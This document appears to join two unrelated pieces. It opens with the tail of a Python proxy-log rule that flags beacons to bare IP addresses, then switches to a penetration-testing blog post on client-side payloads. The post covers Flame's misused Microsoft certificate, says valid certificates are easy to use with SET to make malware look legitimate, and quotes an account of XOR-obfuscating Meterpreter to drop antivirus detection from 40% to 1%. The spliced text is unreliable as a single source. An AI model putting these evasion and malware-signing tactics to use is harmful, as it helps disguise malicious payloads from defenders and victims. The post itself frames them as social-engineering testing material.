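        print(f"{f.client} -> {f.host}: {f.reason}")
```

The bare-IP rule only catches plain HTTP; an HTTPS beacon appears as a CONNECT to host:port, so the same port check applies there when the host is a bare IP.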
<b>Why code signing is not secure</b><br />
<br />
Code signing can provide several valuable features. The most common use of code signing is to provide security when deploying; in some programming languages, it can also be used to help prevent namespace conflicts. Almost every code signing implementation will provide some sort of digital signature mechanism to verify the identity of the author or build system, and a checksum to verify that the object has not been modified. It can also be used to provide versioning information about an object or to store other metadata about an object.<br />
<br />
Many code signing implementations will provide a way to sign the code using a system involving a pair of keys, one public and one private, similar to the process employed by SSL or SSH. For example, in the case of .NET, the developer uses a private key to sign their libraries or executables each time they build. This key will be unique to a developer or group, or sometimes per application or object. The developer can either generate this key on their own or obtain one from a trusted certificate authority (CA). Of course it is not so difficult to sign malicious code: unauthorized digital certificates have been found that chain up to a Microsoft sub-certification authority issued under the Microsoft Root Authority and that can be used to sign malicious code.<br />
<b><br /></b>
More specifically, components of the Flame malware were found to be signed with a certificate that chained up to the Microsoft Enforced Licensing Intermediate PCA certificate authority and ultimately to the Microsoft Root Authority. This code-signing certificate came by way of the Terminal Server Licensing Service, which operates to issue certificates to customers for ancillary PKI-based functions in their enterprise. Such a certificate could (without the corresponding Microsoft update being applied) also allow attackers to sign code that validates as having been produced by Microsoft.<br />
<br />
<b>Why valid certificates are not secure</b><br />
<br />
Obtaining a valid certificate and using it with SET is easy. That this is easy can be verified on numerous web sites reporting compromised certificates; one of them is this one:<br />
<ul>
<li> <a href="http://www.ccssforum.org/malware-certificates.php">http://www.ccssforum.org/malware-certificates.php</a> </li>
</ul>
This is an extract from the web site, which has a long list of compromised certificates:<i> "The following is a list of digital certificates that have been reported by the forum as possibly being associated with malware to various certificate authorities. This information is intended to help prevent companies from using digital certificates to add legitimacy to malware and encourage prompt revocation of such certificates."</i><br />
<br />
<b>Obfuscating Meterpreter </b> <br />
<br />
It is really easy to obfuscate Meterpreter. In the following post <a href="http://spareclockcycles.org/tag/meterpreter/">http://spareclockcycles.org/tag/meterpreter/</a> the blog owner explains that he/she managed to obfuscate Meterpreter by writing an XOR program in Python. The following extract is from the blog:<br />
<br />
<i>"What surprised me during all of this was how ridiculously easy it is to do just that. About 60 lines of Python (I know, way too many) and 20 lines of C was all it took to take my detection rate from 40% to 1% (32 bit version / 64 bit version). The Python code largely is just to automate things, but it also made the XOR crypting easier and allowed me to more easily embed arbitrary executables in my code (which is useful in embedding other, non-metasploit payloads)."</i><br />
<br />
<b>Epilogue</b><br />
<br />
Dropping the payload is a very important part of a social engineering attack. If you do all the other stages like a professional but use an average payload, you won't get the great results you expect. Client-side attacks and social engineering should be included in every penetration testing engagement; if you are not testing for social engineering attacks, a very significant attack vector that real hackers use will be skipped.<br />
<br />
<b>References: </b><br />
<ol>
<li><a href="http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/" target="_blank">http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/</a></li>
<li><a href="http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja">http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja</a><b></b></li>
<li><a href="http://www.honeynet.org/">http://www.honeynet.org/</a></li>
<li><a href="http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html" target="_blank">http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html</a></li>
<li><a href="http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html" target="_blank">http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html</a></li>
<li><a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29" target="_blank">http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29</a></li>
<li><a href="http://securityxploded.com/dll-injection-and-hooking.php" target="_blank">http://securityxploded.com/dll-injection-and-hooking.php</a></li>
<li><a href="http://en.wikipedia.org/wiki/Code_signing">http://en.wikipedia.org/wiki/Code_signing</a> </li>
<li><a href="http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx">http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx</a></li>
<li><a href="http://spareclockcycles.org/tag/meterpreter/">http://spareclockcycles.org/tag/meterpreter/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.com